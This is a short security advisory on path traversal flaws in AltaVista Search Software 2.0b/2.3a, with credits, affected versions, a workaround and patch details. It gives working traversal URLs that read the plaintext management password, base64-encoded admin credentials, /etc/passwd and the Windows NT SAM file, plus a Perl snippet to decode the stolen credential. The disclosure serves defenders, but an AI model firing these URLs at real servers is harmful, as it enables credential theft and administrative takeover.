|
|
|
|
| |
| With AltaVista Search Software, you can create your own search and retrieval Web site with the same relevancy, performance, and efficiency of the powerful AltaVista Search engine (www.altavista.com) used to index the World Wide Web. This software has been found to contain several security vulnerabilities. |
| |
Credit:
The information was provided by: rudi carell.
|
| |
Vulnerable systems:
AltaVista Search Software 2.0b
AltaVista Search Software 2.3a
The template-variable
The main search function (cgi-bin/query?) allows one traversal step back and shows any file in the http directory.
Example:
http://www.example.com:9000/cgi-bin/query?mss=../config
The http directory
The http directory contains some very interesting files:
../config
( Var "MGMT_PW=[ Plaintext MGMT-password ]" )
../logs/mgtstate
( passw=[ encoded mgt-password ] .. NOT the MGMT-password !!!)
../logs/stats.log
( sometimes stats_log )
../logs/access.log
( sometimes access_log )
The mgtstate file is the most interesting. It contains the username/password pair for the online config tool (http://sample-site:9000/cgi-bin/mgt) in the form:
passw=[ encoded user:password string ]
The password is encoded using base64 encoding. It can be easily decoded using uudecode, or using the following Perl script:
#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";
After gaining access to the administrative password it's possible to go to the online config tool (http://simple-site:9000/cgi-bin/mgt) where it's possible to do almost anything.
Temporary workaround:
Full steps would be:
- Edit <install-dir>/httpd/config file and change MGMT_IPSPEC from "0.0.0.0/0" to a specific IP such as "127.0.0.1/32"
- Stop page gathering via management interface
- Restart AltaVista search service (to re-read config file)
- Restart page gathering if necessary
- Change the username/password through the management interface to bogus information
- Exploit server and download ../logs/mgtstate (puts file in cache) http://localhost:9000/cgi-bin/query?mss=../logs/mgtstate
- Change the username/password through the management interface to something different (but not used anywhere else)
- Avoid restarting the AltaVista service or clearing the cache
Patch
A patch is available on AltaVista's Web site at:
http://doc.altavista.com/business_solutions/search_products/free_downloads/search_intranet.shtml
The patch is labeled "AltaVista Search Intranet V2.3A Security Patch 12/99".
Using URI encoded strings
Going to the URL:
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
Will fetch the /etc/passwd file on UNIX.
Fetching the URL:
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
Will fetch the password database (SAM) on Windows NT servers.
No workaround is currently available for this problem.
|
|
|
|
|
|
|
|
|
|
